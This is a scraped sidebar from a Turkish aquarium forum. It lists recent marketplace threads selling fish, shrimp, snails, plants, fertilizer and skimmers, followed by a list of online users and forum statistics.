- Ista Yüzey Temizleyici (surface Skimmer) I521 Amati340 16:11
- Ramshorn Salyangoz (10 Adet) Amati340 16:11
- Osmocote Akıllı Kapsül Gübre ( 9 Ay Etkili) Amati340 16:11
- Microfex( Dero Worm) & Beyaz Kurt & Sirke Kurdu Amati340 16:11
- Diy Gübreler Kargo Bedava Bitkiler, Balıklar reano 16:01
- Karides ,vatoz, Bitki Çeşitleri, Gübre reano 16:01
- A++ Kalitedeki Saksı Bitkilerimiz Sizlerle AQUAGREEN 15:49
- Aykılıç, King Ve Düz Kılıç Yavruları A Kalite ali özer 15:23
- Kendi Üretimim Nadir Balıklar.. Cyber_Scout 15:06
- Betta Albimarginata, Rubra Cyber_Scout 15:06
- 1,5---2---2,5 Cm Kafalı Beyaz Yunus Yavruları 300 tetikk 15:05
- Kendi Üretimim Karides Türleri, Salyangoz Türleri AquaShirmp 14:50
KULLANICILAR
- 61 Online Kullanıcı, 33 Üye
Online Kullanıcılar
oguzsel,
Birtek,
ilterisdoğukan,
yeekim,
Kuduoglu,
osmandbnl,
sina cen,
0rnn,
omerkaya40,
MiSoSiKiaN,
ibas34,
Oğul Hüseyin,
DABARAKATO,
DigitalPen,
Kınayu,
oktay42,
altuntasseref,
Khatrom,
hazalca,
ilkerkrsln,
Sekizo,
kilic88,
Akrattin,
livadi,
Yücel BOZDEMİR,
mustafatelli,
Deathgrip,
Brdk64,
√olkaπ,
berat76,
abunil,
1win_ghsa,
zen666,
oguzozt,
FORUM İSTATİSTİKLERİ
- 3,797,668 Mesaj
- 408,613 Konu
- 91 Forum
- 145,128 Forum Üyesi
- 1,466 Özel Forum Üyesi
- 29 Kıdemli Akvarist
- 1,941 Dün Giriş Yapan Üye
Şu ana kadar en fazla 1365 kişi 27.03.2012 23:21 tarih ve saatinde çevrim içi oldu.

























